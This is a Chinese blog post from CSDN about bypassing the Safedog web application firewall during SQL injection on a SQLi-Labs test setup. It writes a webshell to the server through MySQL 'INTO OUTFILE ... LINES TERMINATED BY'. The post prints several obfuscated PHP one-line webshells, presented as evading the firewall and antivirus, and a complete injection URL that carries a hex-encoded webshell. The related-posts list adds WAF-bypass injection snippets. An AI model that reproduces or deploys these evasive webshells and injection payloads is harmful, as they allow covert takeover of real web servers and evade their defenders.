SQL注入过安全狗直接getshell

最新推荐文章于 2025-04-08 17:13:03 发布
最新推荐文章于 2025-04-08 17:13:03 发布
阅读量468 收藏 1
点赞数 1
分类专栏: 安全 文章标签: 安全 mysql 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42042353/article/details/108809765
版权
本文介绍了一种利用MySQL的特定功能和精心构造的一句话木马来绕过安全狗等WAF的方法,并详细展示了如何通过注入攻击将木马写入目标服务器的具体步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

实验环境

1、phpstudy搭建的SQLi-Labs(MySQL)
2、安全狗4.0

成功所需要的条件

1、准备一个可以过狗过杀软的一句话
2、网站目录的绝对路径

直接进入正题

普通的注入攻击直接被安全狗拦截
在这里插入图片描述
比方说我们获取到的网站绝对路径为“C:/phpStudy4IIS/WWW/”
(这里获取网站绝对路径有很多方式,不一一说明)

这里用到的注入用的是MySQL的数据导入功能“LINES TERMINATED BY”
它的功能就是将我们构造好的字符串直接导入在具体的文件里。很多waf并没有对MySQL的这个功能进行过滤检测。

这里分享几个可以过狗过杀软的一句话:

<?php '%00';"${/*%00*//*ee*/@/*vve*/@/*asd*/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Eval(@@@${/*_POCT*/"_PO"/*ce*/."ST"/*POCT*/}/**/['pass']/**/)/**//**/}/**/";

"${phpinfo()}";
"$@{phpinfo()}";
"${@@!phpinfo() }";
${"_POST"}['id’] == $_POST[‘id’];
var_dump(${"_POST"}['id']);

<?php

define(@"_"/*("%00_")*/, range(1,200), true);eval("echo '';".'/*");*/'.
${
''."_".''.chr(_[79]).''.
"OST".""}
[chr(_[104]).'d'.'']
);

 ?>

这里我们使用第一个进行构造Payload:

http://192.168.48.138:8980/sqli/Less%2D1/?id=1' LIMIT 0,1 INTO OUTFILE 'C:/phpStudy4IIS/WWW/ma7.php' LINES TERMINATED BY 0x3c3f7068702027253030273b22247b2f2a2530302a2f2f2a65652a2f402f2a7676652a2f402f2a6173642a2f404040404040404040404040404040404040404040404040404040404040404040404576616c28404040247b2f2a5f504f43542a2f225f504f222f2a63652a2f2e225354222f2a504f43542a2f7d2f2a2a2f5b2770617373275d2f2a2a2f292f2a2a2f2f2a2a2f7d2f2a2a2f223b --+

(这里的马需要使用十六进制编码)

成功注入后看一下效果

在这里插入图片描述
在这里插入图片描述

看一下马:
在这里插入图片描述
在这里插入图片描述

总结

1、使用“LINES TERMINATED BY ”过狗
2、使用免杀一句话过狗过杀软
3、配合网站绝对路径一步到位getshell

SQL注入-过安全狗apache4.0
m0_60716947的博客
05-15 998
目录 一、安全狗的安装 二、Fuzz 三、过狗 (1)and 绕过 (2)order by 绕过 (3)union select 绕过 (4)database() 绕过 (5)获取其他库 (6)获得所有表 (7)获得所有字段 (8)获得数据 四、总结 一、安全狗的安装 这里有一篇很不错的文章,在安装的过程中出现的问题基本都能在里面找到解决方法 安全狗安装_YsterCcc的博客-优快云博客_安全狗安装 如果还是不行就找一个装了phpstudy老版本的靶机,比如我上次写.
sql注入getshell
摘星怪sec的blog
04-17 793
条件:web目录具有写的权限,能够使用单引号;知道网站绝对路径;secure_file_priv为空以sqli-labs举例,secure_file_priv的值默认是NULL(5.5之前默认是空的),则表示限制mysqId不允许导入以及导出在mysql/my.ini中查看是否有secure_file_priv参数,这里是没有的因此我们加上去:secure_flie_priv=''即可这里进行16进制转换,因此是0X开头,写入“
sql注入绕过安全狗
weixin_48776804的博客
02-15 730
sql注入安全狗
SQL注入漏洞-第二篇
最新发布
JLN1789015334的博客
04-08 730
主要介绍了SQL的一些绕过技术,还有SQL的防御措施。与此同时,介绍了一个渗透工具sqlmap的使用以及爆库的具体操作。
SQL注入绕过安全狗
qq_45462249的博客
07-15 1410
网站安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具,WAF检测一般分为两种,一种白名单,一种黑名单。白名单相对于黑名单来说,更加安全,但是白名单由于设置的比较严格,有时会影响用户的正常访问,所以WAF还是用黑名单的比较多。后面接数据库版本号时,如果自身版本号大于等于字符数,就会将注释中的内容执行,否则就会当做注释来处理。查询这些分别注意union和select连接,from和表连接,还有database()括号的连接,需要用到以上方法结合起来。...
sql注入安全狗(官网绕waf)【原创】
weixin_30237281的博客
03-26 494
作者:风之传说 给大家来个全新的过狗的语句。拿官方网站做测试。 众所周知,waf过select , 过 union ,过 from 是最难的。首先我们来看看官网: 来看看基础的and 1=1: 再来个联合查询 union select 1,2,3 可以看到,都会被拦截。由于此文不是装逼文,我们就不讲如何一步步进行突破了。我直接给出语句吧:%''union+/*!50000%53...
南方数据企业网站管理系统源码包-存有sql注入漏洞与数据库备份getshell漏洞.zip
01-05
南方数据企业网站管理系统-存有sql注入漏洞与数据库备份getshell漏洞,如有侵权,请联系优快云管理员删除即可
渗透测试靶机实战-SQL注入getshell
yummy11111的博客
07-18 1023
SQL注入getshell靶机实战
DB2数据库SQL注入手册1
08-08
SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制数据库。 在本手册中,我们将介绍如何在DB2数据库中进行SQL注入攻击的检测和防止。同时,我们还将提供一些实用...
SQL注入-绕过安全狗
LJH1999ZN的博客
02-15 5233
绕过安全狗的常见四种方式 id=1'/*!44444order*/ /*!44444by*/3--+
封神台靶场-sql-注入绕过防护getshell
weixin_43446292的博客
03-10 5648
url为http://rhiq8003.ia.aqlab.cn/bees/,此页面尝试sql注入,不成功;在路径后面加admin可以跳转到管理员登录界面, http://rhiq8003.ia.aqlab.cn/bees/admin 在登录框测试sql注入,输入admin’/123456(直接使用admin/admin即可成功登录) 报错,存在字符型注入,使用报错注入进行测试,根据响应结果可知对and过滤,使用双写 admin’ an and d updatexml(1,concat(0x7e,(sel
记一次艰难的SQL注入(过安全狗)
热门推荐
realmels的博客
02-01 1万+
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 文章目录前文链接1.1 前言2.1 注入测试2.1.1 绕过第一式:汉字双字节编码绕过单引号3.1 获取数据库3.1.1 绕过第二式:注释3.1.2 绕过第三式:内联注释绕过空格4.1 获取表名4.1.1 绕过第四式:select过安全狗5.1 获取列名5.1.1 绕过第五式:骚操作绕过魔术函数6.1 爆帐密总结 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发.
过最新版安全狗SQL注入
一个普普通通的博客
03-07 2647
安全狗SQL注入
sql注入教程】mysql注入直接getshell
dfdhxb995397的博客
08-30 1619
Mysql注入直接getshell的条件相对来说比较苛刻点把 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了 3:要有file权限,默认情况下只有root有 4:对目录要有写权限,一般image之类的存放突破的目录就有 在实际环境中我只遇过一次,为了做实验,我把php.ini文件...
实战sql注入绕过安全狗
weixin_45901902的博客
08-19 638
实战安全狗bypass 之前有段时间一直在弄注入绕过,正好一个朋友手上有个安全狗的站 绕过 and 1=1 这种很显然直接被拦截,这里进行fuzz and 1 like 1 拦截 and /!1=1/ 不拦截 and hex(1) 不拦截 %23%0a 1=1 拦截 绕过order by 发现单个order不拦截 单个by不拦截 只要order by 结合就被拦截 安全狗他拦截哪里我们就绕哪里 order%23%0aby 1 不拦截 order /!by/ 1拦截 .
安全狗SQL注入绕过
qq_38675102的博客
02-09 3049
安全狗waf绕过
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值